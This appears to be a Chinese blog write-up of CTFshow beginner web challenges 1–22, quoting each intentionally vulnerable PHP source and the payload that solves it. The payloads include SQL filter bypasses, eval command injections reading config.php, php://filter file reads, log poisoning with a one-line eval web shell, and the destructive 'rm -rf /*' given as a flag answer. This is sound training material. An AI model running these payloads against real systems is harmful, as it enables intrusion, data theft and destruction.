CTFshow_萌新(web)

最新推荐文章于 2024-05-26 13:52:27 发布
最新推荐文章于 2024-05-26 13:52:27 发布
阅读量496 收藏 2
点赞数 1
分类专栏: ctf 文章标签: 数据库 java sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128621211
版权

CTFshow_萌新(web)

1.web1

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
    $id = $_GET['id'];
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 根据题目分析,需要GET方式传递id参数,同时满足id<999并且id=1000时显示flag,所以我们构造的参数是`?id=900||id=1000

    请添加图片描述

2.web2

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/or|\+/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 该题和web1类似,只是加了对部分关键字的过滤。解法同web1

    请添加图片描述

3.web3

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 该题和web2类似,加了对部分关键字的过滤。构造的参数为?id=~~1000
    请添加图片描述

4.web4

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/or|\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 该题和web3类似,加了对部分关键字的过滤。构造的参数为?id=~~1000

    请添加图片描述

5.web5

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 该题和web4类似,加了对部分关键字的过滤。构造的参数为?id=~~1000

    请添加图片描述

6.web6

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 该题和web5类似,加了对部分关键字的过滤。构造的参数为?id=~~1000

    请添加图片描述

7.web7

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|\~|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

  • 该题和web6类似,加了对部分关键字的过滤。构造的参数为将~~1000进行进制转换为0b1111101000即可

    请添加图片描述

8.web8

  • 题目

    <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件,key flag 也在里面定义
include("config.php");
# 判断get提交的参数flag是否存在
if(isset($_GET['flag'])){
        if(isset($_GET['flag'])){
                $f = $_GET['flag'];
                if($key===$f){
                        echo $flag;
                }
        }
}else{
    highlight_file(__FILE__);
}

?>
</body>
</html>

  • 通过GET传递参数flag,并且 k e y 和 key和 keyf全等时输出flag。再根据提示阿呆熟悉的一顿操作,去了埃塞尔比亚。执行的是删库操作,所以flag的参数值为rm -rf /*

9.web9

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • 通过GET方式传递参数c,并且当参数中含有system|exec|highlight时输出c,所以参数为?c=system(%27tac%20config.php%27);

10.web10

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • 和web9类似,参数为?c=show_source(%27config.php%27);

11.web11

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • 和web10类似,做一个简单的拼接即可,参数为?c=$x=%27sys%27;$y=%27tem%27;$z=$x.$y;$z(%27tac%20config.php%27);

12.web12

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat|\.|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • 和web11类似,另外多了几个过滤,并且进行base64编码后才能获得flag;Y29uZmkqconfi*的base64编码

    ?c=$a=base64_decode('Y29uZmkq');passthru("tac $a");

13.web13

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat|\.|\;|file|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • 和web12类似,参数为?c=passthru(%27tac%20confi*%27)?>

14.web14

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat|\(|\.|\;|file|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • 发现过滤东西又多了,这次括号也过滤了。payload为?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php。对回显结果进行base64解码得到flag

15.web15

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|\\*|\?|\<|\>|\=|exec|highlight|cat|\(|\.|file|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

  • payload:?c=include$_GET['a'];&a=php://filter/read=convert.base64-encode/resource=config.php,解码得到flag

16.web16

  • 题目

    <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){
            echo $flag;
        }else{
            echo "nonono!";
        }
}else{
        highlight_file(__FILE__);
}
?>

  • a6f57ae38a22448c2f07f3f95f49c84e进行md5解密,结果为ctfshow36d,当c=36d时,判定为真,获得flag

17.web17

  • 题目

    <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php/i",$c)){
               include($c);

       }


}else{
        highlight_file(__FILE__);
}
?>

  • 使用data协议报错allow_url_include没开

    请添加图片描述

  • 试试日志文件包含,使用burpsuite抓包,从响应包中发现Server: nginx/1.18.0 (Ubuntu)

    请添加图片描述

  • Ubuntu中nginx的日志文件默认为/var/log/nginx/access.logor/var/log/nginx/error.log。访问?c=/var/log/nginx/access.log成功,可以看到记录了User-Agent

    请添加图片描述

  • 构造一句话写入User-Agent,进入日志文件,burp中修改User-Agent为<?php @eval($_POST[glc]);?>

    请添加图片描述

  • 使用蚁剑连接网址?c=/var/log/nginx/access.log,打开文件36d.php文件获得flag

    请添加图片描述

18.web18

  • 题目

    <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

  • 过滤file,使用web17的方法可解

19.web19

  • 题目

    <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file|base/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

  • 过滤base,使用web17的方法可解

20.web20

  • 题目

    <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file|base|rot/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

  • 过滤rot,使用web17的方法可解

21.web21

  • 题目

    <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file|\:|base|rot/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

  • 用web17方法可解

22.web22

  • 题目

    <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/\:|\/|\\\/i",$c)){
               include($c.".php");
       }


}else{
        highlight_file(__FILE__);
}
?>
果粒程1122
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow-萌新-web8( 从删库到跑路)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web8关,这一关考察的是一个梗??? 进去页面以后展示了部分源码,提交一个参数flag,与文件中的key相同即可夺旗 这一关的线索就在进入关卡的弹窗中,阿呆熟悉的一顿操作,去了埃塞尔比亚 是非洲的一个国家,这是删库跑路的节奏啊,payload如下 ?flag=rm -rf /* rm指令 rm -rf /* 是Linux的一条指令,/*代表根目录下所有路径,作用是删除根目录下所有文件,也就是删除系统中的所有文件 格式:rm ...
ctfshow web8--sql注入
Dream'
10-19 2116
问题描述 题目提示是一道sql注入题 打开题目,猜测注入点应该在id那里 经过测试,发现该题过滤了union关键字、单引号、逗号、空格 问题解决 1.过滤了union关键字就不可以用联合注入了,尝试布尔盲注。 2.过滤了逗号,使用mid(username from 1 for 1)代替mid(username,1,1); 使用limit 1 offset 1代替limit 1,1 3.过滤了空格就是用/**/注释来绕过。 4.过滤了...
【CTF Web】CTFShow web8 Writeup(PHP+GET请求+Linux命令)
最新发布
HEX9CF的技术博客
05-26 298
1阿呆熟悉的一顿操作,去了埃塞尔比亚。PS:阿呆第一季完,敬请期待第二季!
ctfshow-web80
m0_73303597的博客
01-04 618
自用
ctfshow web系列
RealIiikun的博客
04-07 961
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
2024年最新ctfshow-WEB-web8_ctfshow web8,2024年最新全网首发
m0_54903333的博客
05-11 259
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。接下来进行脱库, 由于盲注脱库比较复杂, 此处我们构造Python脚本进行自动化脱库, 注意payload中的字符串不要换行, 否则可能会出问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。由以上返回结果可知, 该页面存在SQL注入, 注入点为。成功获取当前数据库名: web8。接下来获取获取数据库中所有表。因篇幅有限,仅展示部分资料。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctf.show爆破(web21-web23)
wanan的博客
08-31 929
ctf.show爆破(web21-web23)
ctfshow web入门——web23
m0_74093152的博客
02-22 356
ctfshowweb入门——web23
ctfshow web入门 web23详解
m0_73860001的博客
07-09 459
web2310此题为 【从0开始学web】系列第二十三题此系列题目从最基础开始,题目遵循循序渐进的原则希望对学习CTF WEB的同学有所帮助。
ctfshow 萌新web题解
qq_41788704的博客
10-09 1286
web1 十六进制 0x38e web2 异或 200^800 按位与 992|8 web3 加减乘除都可以 --1000 负负得正 web4 id=1 or 1=1# id=id# 上面是显示所有的数据,flag自然也会在里面 ‘1000’ MySQL会自动转换类型 web5 异或 144^888 web6 取反 ~~1000 web7 二进制 0b1111101000 web8 rm -rf /* 删库跑路?? web9 可以直接执行命令 system('cat config.php
2024年最新CTFShow“萌心区”WP(下)_ctfshow_萌新web18,2024年最新2024最新中高阶网络安全面试题总结
2401_84264491的博客
05-11 234
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
wp ctfshow 萌新 获得百分之百的快乐&&web23&&web24
2301_81040377的博客
03-30 628
(我试了一下more和cat都不行,应该是屏蔽了) 我用的朋友电脑所以截图就不提供了,大家将就着看。# 单起一个线程,爆破下一次upload的文件名 uploaded: uploads/20220818222707124.php。# 用本次的文件名推算下一次的文件名,相差sleep一次的时间间隔。# 用本次的文件名推算下一次的文件名,相差sleep一次的时间间隔。# 单起一个线程,爆破下一次upload的文件名。应该是可以直接得到flag的,如果不行把命令像上面一样改了就行。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 733
任务环境说明:服务器场景:Server1。
[ctfshow]入门
qq_61109509的博客
01-18 1712
3,misc3 打开后发现后缀名是bpg.那就找能打开bpg的工具 4,misc4 打开发现几个.txt,改后缀名拼接是flag 也用python获得图片中文字的方法 import pytesseract from PIL import Image pytesseract.pytesseract.tesseract_cmd = r'D:\应用\Tesseract-OCR\tesseract.exe' tessdata_dir_config = r'--tessdata-dir "D:\应用
ctfshow-__萌新
09-14
根据引用中提到的flag,还可以使用Stegsolve工具打开压缩包里的图片,并选择File Format来查看flag,即flag{ctfshow_im_coming}。根据引用中提到的flag,还可以使用notepad打开txt文件,并使用正则表达式[[:upper:]]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值